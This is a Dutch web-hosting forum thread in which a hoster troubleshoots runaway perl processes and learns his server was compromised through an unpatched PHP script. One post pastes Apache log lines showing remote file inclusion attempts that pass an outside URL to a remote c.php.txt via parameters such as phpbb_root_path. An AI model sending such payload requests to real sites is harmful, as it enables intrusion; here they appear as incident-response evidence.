Likes Likes:  0
Resultaten 1 tot 11 van de 11

Onderwerp: [perl] van wie?

  1. #1
    [perl] van wie?
    Allrounder
    1.420 Berichten
    Ingeschreven
    18/04/06

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    27 Berichten zijn liked


    Naam: Maarten
    Bedrijf: Keizer IT
    URL: keizer.it
    Registrar SIDN: ja
    KvK nummer: 56981139

    Thread Starter

    [perl] van wie?

    hallo

    hoe kom ik er achter welk perl bestand mijn server laat flippen?

    Code:
     PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
    13337 apache    25   0  8308 4736 1924 R 41.6  0.2  47:00.81 perl
    10020 apache    25   0  8032 4392 1964 R 41.4  0.2 606:50.67 perl
    25537 apache    15   0 52780  39m  10m S  6.1  2.0   0:02.80 httpd
     1142 apache    15   0 10320 6772 2008 S  1.8  0.3   0:11.99 perl
    28089 apache    15   0 12628 8296 2896 S  1.5  0.4   0:11.55 perl
     9908 root      35  19  1768  564  204 R  1.3  0.0   0:13.90 gzip
    30722 apache    15   0  9996 6580 2012 S  0.8  0.3   0:04.34 perl
     3006 apache    15   0 10436 7004 1996 S  0.8  0.3   0:09.11 perl
     3314 apache    15   0 10052 6632 1996 S  0.8  0.3   0:13.92 perl
    28059 apache    15   0 12524 8228 2896 S  0.5  0.4   0:08.10 perl
    21586 root      34  19  1768  524  204 R  0.5  0.0   0:03.90 gzip
      147 root      15   0     0    0    0 S  0.3  0.0  19:38.24 kswapd0
    28067 apache    16   0 12908 8616 2900 S  0.3  0.4   0:06.75 perl
    28082 apache    15   0 10084 6540 2000 S  0.3  0.3   0:08.81 perl
    28225 apache    15   0 12824 8512 2880 S  0.3  0.4   0:06.06 perl
    30743 apache    16   0  9992 6576 2012 S  0.3  0.3   0:25.95 perl
     3293 apache    15   0  9292 5764 1992 S  0.3  0.3   0:08.57 perl
    zoals je ziet zijn er nogal wat perltjes open en dat vind me server niet zo lief (constante load 8)

    alvast bedankt!

  2. #2
    [perl] van wie?
    The anonymous BOFH
    665 Berichten
    Ingeschreven
    28/06/04

    Locatie
    nvt

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nvt
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Mogelijks ga je dit kunnen achterhalen met lsof |grep 13337 of via /proc/13337/environ.

  3. #3
    [perl] van wie?
    Programmeur / Hoster
    3.952 Berichten
    Ingeschreven
    20/06/06

    Locatie
    Wijlre

    Post Thanks / Like
    Mentioned
    28 Post(s)
    Tagged
    0 Thread(s)
    647 Berichten zijn liked


    Naam: John Timmer
    Bedrijf: SystemDeveloper.NL
    Functie: Eigenaar
    URL: www.systemdeveloper.nl
    KvK nummer: 14083066
    View johntimmer's profile on LinkedIn

    kijk eens wat 'lsof|grep perl' opleverd ?

    (Of lsof|grep apache of oid)
    SystemDeveloper.NL - 64BitsWebhosting.EU : Softwareontwikkeling & Hosting freaks

  4. #4
    [perl] van wie?
    geregistreerd gebruiker
    2.055 Berichten
    Ingeschreven
    14/07/03

    Locatie
    Goes

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    43 Berichten zijn liked


    Naam: Sebastiaan Koetsier
    Bedrijf: Sentia BV
    Functie: Senior Network Engineer
    URL: www.sentia.com
    View jskoetsier's profile on LinkedIn

    check de error log van je apache om te achterhalen waar de wgetjes naartoe gegaan zijn en kijk ook eens in /tmp.
    Expert Network Engineer - SENTIA BV (AS8315)

  5. #5
    [perl] van wie?
    Allrounder
    1.420 Berichten
    Ingeschreven
    18/04/06

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    27 Berichten zijn liked


    Naam: Maarten
    Bedrijf: Keizer IT
    URL: keizer.it
    Registrar SIDN: ja
    KvK nummer: 56981139

    Thread Starter
    dan komt er echt een te grote lijst met domeinen en log bestanden waar (deleted) achter staat... ik zal me apache log es checken

    wat moet ik in me /tmp?

    Code:
    127.0.0.1 - - [06/Dec/2006:13:40:31 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:40:58 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:45:59 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:50:42 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:53:10 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:54:03 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:55:24 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:56:39 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:57:00 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:58:24 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:59:01 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:13:59:03 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:01:39 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:01:41 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:03:14 +0100] "GET /?vwar_root=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:03:58 +0100] "GET /?textFile=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:04:32 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:08:03 +0100] "GET /?basepath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:09:06 +0100] "GET /?setmodules=pagestart&phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:23:13 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:27:22 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:28:53 +0100] "GET /?thispath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:30:31 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:33:14 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:33:57 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:37:28 +0100] "GET /? HTTP/1.1" 200 2675 "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:37:51 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:43:31 +0100] "GET /?thispath=http://domeintjeeee.nl/c.php.txt%3f HTTP/1.1" 500 - "-" "libwww-perl/5.79"
    127.0.0.1 - - [06/Dec/2006:14:47:03 +0100] "GET /?phpbb_root_path=http://domeintjeeee.nl/c.php.txt%3f HTTP

    hebben we een boosdoener?

    update: "domeintjeeeee.nl" staat niet bij mij gehost, waarom roeptie een c.php.txt aan op die lokatie?
    Laatst gewijzigd door Keizer; 06/12/06 om 16:00. Reden: Automerged Doublepost

  6. #6
    [perl] van wie?
    geregistreerd gebruiker
    2.055 Berichten
    Ingeschreven
    14/07/03

    Locatie
    Goes

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    43 Berichten zijn liked


    Naam: Sebastiaan Koetsier
    Bedrijf: Sentia BV
    Functie: Senior Network Engineer
    URL: www.sentia.com
    View jskoetsier's profile on LinkedIn

    omdat ie daar die file vandaan haalt..
    Expert Network Engineer - SENTIA BV (AS8315)

  7. #7
    [perl] van wie?
    Allrounder
    1.420 Berichten
    Ingeschreven
    18/04/06

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    27 Berichten zijn liked


    Naam: Maarten
    Bedrijf: Keizer IT
    URL: keizer.it
    Registrar SIDN: ja
    KvK nummer: 56981139

    Thread Starter
    ik vroeg 'wat' moet ik daar, ofwel wat moet ik doen om te checken

    /me si teh b00n

  8. #8
    [perl] van wie?
    geregistreerd gebruiker
    699 Berichten
    Ingeschreven
    21/05/03

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    Crisis vriend. Volgens mij heb je echt geen idee wat nu speelt.

    Vermoedelijk ben je gehackt door een PHPbb / Joomla / Mambo / K#tscript, welke niet gepatched is. De "hack" vind je terug in /tmp of /var/tmp, en meer informatie vind je in /proc/<pid>

    Ergo:

    - Leer je klanten patchen

    if (klant =0)
    {
    leer_patchen();
    ;

  9. #9
    [perl] van wie?
    Programmeur / Hoster
    3.952 Berichten
    Ingeschreven
    20/06/06

    Locatie
    Wijlre

    Post Thanks / Like
    Mentioned
    28 Post(s)
    Tagged
    0 Thread(s)
    647 Berichten zijn liked


    Naam: John Timmer
    Bedrijf: SystemDeveloper.NL
    Functie: Eigenaar
    URL: www.systemdeveloper.nl
    KvK nummer: 14083066
    View johntimmer's profile on LinkedIn

    Citaat Oorspronkelijk geplaatst door DiedX Bekijk Berichten
    Crisis vriend. Volgens mij heb je echt geen idee wat nu speelt.

    Vermoedelijk ben je gehackt door een PHPbb / Joomla / Mambo / K#tscript, welke niet gepatched is. De "hack" vind je terug in /tmp of /var/tmp, en meer informatie vind je in /proc/<pid>

    Ergo:

    - Leer je klanten patchen

    if (klant =0)
    {
    leer_patchen();
    ;
    if (klant == 0){
    leer_patchen();
    }

    /* Ik heb hem even ge-patched voor je */
    SystemDeveloper.NL - 64BitsWebhosting.EU : Softwareontwikkeling & Hosting freaks

  10. #10
    [perl] van wie?
    geregistreerd gebruiker
    699 Berichten
    Ingeschreven
    21/05/03

    Locatie
    Rotterdam

    Post Thanks / Like
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    0 Berichten zijn liked


    Registrar SIDN: nee
    KvK nummer: nvt
    Ondernemingsnummer: nvt

    GVD, ik wist dat het ergens de fout in ging Thanks!

    Wellicht was mijn post iets te hard naar TS toe, maar ik denk dat dit kennis is waar je je snel op in moet lezen. Ik heb de grote hints al gegeven. Lees, vergaar kennis, en zorg er voor dat je het lek boven hebt. Nu is het nog iets simpels, maar de volgende keer is het een rootkit, en sta je in RedBus backups terug te zetten (die maak je wel?)



  11. #11
    [perl] van wie?
    Allrounder
    1.420 Berichten
    Ingeschreven
    18/04/06

    Locatie
    Groningen

    Post Thanks / Like
    Mentioned
    3 Post(s)
    Tagged
    0 Thread(s)
    27 Berichten zijn liked


    Naam: Maarten
    Bedrijf: Keizer IT
    URL: keizer.it
    Registrar SIDN: ja
    KvK nummer: 56981139

    Thread Starter
    we zijn nu 24 uur verder en de server draait weer als een zonnetje.. kheb op andere server wel es een deface gehad maar stonden gelukkig maar 20 domeinen op (en ja tuurlijk maak ik back-ups)

    maar goed gelukkig ben ik niet de gene die er verstand van heeft dus het komt allemaal goed, thnx

Labels voor dit Bericht

Webhostingtalk.nl

Contact

  • Rokin 113-115
  • 1012 KP, Amsterdam
  • Nederland
  • Contact
© Copyright 2001-2021 Webhostingtalk.nl.
Web Statistics